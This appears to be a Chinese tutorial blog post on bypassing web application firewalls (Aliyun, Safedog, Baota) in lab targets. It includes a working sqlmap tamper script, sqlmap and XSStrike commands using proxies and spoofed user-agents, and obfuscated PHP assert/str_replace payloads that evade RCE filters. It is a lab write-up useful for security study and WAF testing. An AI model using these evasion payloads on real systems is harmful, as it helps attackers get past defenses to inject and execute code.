第49天-WAF 绕过-漏洞利用之注入上传跨站等绕过

思维导图

在这里插入图片描述

阿里云 + safedog + BT waf

SQL 注入

注入方式

手工注入

简单、不需要考虑CC 防护

工具注入

sqlmap 速度很快,会触发CC防御

safedog CC 绕过

user-agent

–delay

代理池:换ip

CC 拦截绕过

user-agent:伪装成爬虫白名单

代理池:每秒钟换ip

延时设置: --delay

aliyun + safedog 演示

sqlmap工具+代理 +tamper (自写注入规则)

–tamper

rdog.py

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""


from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def tamper(payload,**kwargs):
    retVal =""
    if payload:
        payload = payload.replace("union","%23a%0aunion")
        payload = payload.replace("select","/*!4457select*/")
        payload = payload.replace("%20","%23a%0a")
        payload = payload.replace(" ","%23a%0a")
        payload = payload.replace("database()","database%23a%0a()")
    return payload

python sqlmap.py -u "http://test.xiaodi8.com/sqlilabs/Less-2/?id=1" --proxy="http:tps123.kdlapi.com:15818" --tamper="waf-dog.py"

在这里插入图片描述

仅仅这样是不行,

因为使用的是sqlmap工具,user-agent中会有明显的sqlmap的标识,阿里云,以及bt,safedog都有指纹识别

在这里插入图片描述

所以还要修改 user-agent

在这里插入图片描述

模仿用户

使用自己的user-agent

python sqlmap.py -u "http://test.xiaodi8.com/sqlilabs/Less-2/?id=1" --proxy="http:tps123.kdlapi.com:15818" --tamper="waf-dog.py" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0"

也可以使用sqlmap的代理随机设置

–random-agent

python sqlmap.py -u "http://test.xiaodi8.com/sqlilabs/Less-2/?id=1" --proxy="http:tps123.kdlapi.com:15818" --tamper="waf-dog.py" --random-agent

sqlmap工具+代理 +tamper+user-agent 就可以绕过

代理:绕过传cc

tamper:注入规则

user-agent:修改ua,防止匹配到工具的指纹!

效果

在这里插入图片描述

aliyun + safedog + BT 演示

BT 开启

在这里插入图片描述

BT过滤规则

在这里插入图片描述

BT 过滤 /*

在这里插入图片描述

把 /* 去掉,没有拦截

在这里插入图片描述

绕过宝塔过滤/*规则

%00截断 绕过

在这里插入图片描述

–tamper 过BT(增加%00)

在这里插入图片描述

文件上传

1.php 截断 参考前面上传 waf 绕过 payload

换行截断

在这里插入图片描述

在这里插入图片描述

XSS 跨站

利用 XSStrike 绕过 加上–timeout 或–proxy 绕过 cc

跑就完事儿了!

xsstrike.py -u "目标网址" --timeout x  延时
xsstrike.py -u "目标网址" --proxy  代理地址

其他集合

RCE

aliyun + safedog +BTwaf

目标pikachu靶场rce漏洞

源码

在这里插入图片描述

尝试

在这里插入图片描述

被拦截

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ARJQjA1y-1649816307030)(image49/pikachu_rce_3.png)]

拦截日志,触发了phpinfo(

在这里插入图片描述

模拟post 请求 传递参数txt和submit

txt=echo 123&submit=%E6%8F%90%E4%BA%A4ce

可行

在这里插入图片描述

txt=phpinfo()&submit=%E6%8F%90%E4%BA%A4ce

被拦截

在这里插入图片描述

本地测试

在这里插入图片描述

在这里插入图片描述

x.php?x=base64-decode()

在这里插入图片描述

在这里插入图片描述

结果是空白,没有显示!

在这里插入图片描述

为什么空白?原因是没有输出

服务器测试

在这里插入图片描述

在这里插入图片描述

被防火墙拦截

在这里插入图片描述

尝试算法可逆编码算法:

base64

url 编码

进制编码等

※※可逆算法绕过

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pmMRxX3q-1649816307035)(image49/QQ截图20220411195013.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gaJrFr6a-1649816307035)(image49/QQ截图20220411195250.png)]

没有显示,为什么?

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SA3hyPib-1649816307036)(image49/QQ截图20220411195203.png)]

没有显示是因为phpinfo()没有被执行,加个assert()函数就行

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-42s77vxi-1649816307036)(image49/QQ截图20220411195317.png)]

※※替换绕过
txt=$y=str_replace('x','','pxhpxinxfo()');assert($y);&submit=%E6%8F%90%E4%BA%A4ce

pxhpxinxfo() 绕过防护规则,phpinfo(),然后把x 替换为空,达到绕过效果!

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kAqvXHvI-1649816307037)(image49/QQ截图20220411195447.png)]

各种绕过尝试

※※拼接+替换绕过
txt=$X='asse';$xx='rt';$xxx=$x.$xx;$y=str_replace('x','','pxhpxinxfo()');assert($y);&submit=%E6%8F%90%E4%BA%A4ce

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Ghj81UPU-1649816307037)(image49/QQ截图20220411195549.png)]

※※更改传参方式

GET被拦截

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4ks1U3yb-1649816307037)(image49/QQ截图20220411200758.png)]

宝塔日志

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0aqZqRIp-1649816307038)(image49/QQ截图20220411195656.png)]

REQUERST

换一个传参方式 为REQUERST ,就绕过了。(毕竟网站要正常运行,一些正常的功能是不能影响的,还是会有一些规则是可以利用的。有这些就够了!足以绕过)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tVi5z3XF-1649816307038)(image49/QQ截图20220411195727.png)]

文件包含

没什么好说的就这几种
…\ …/ …\等

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值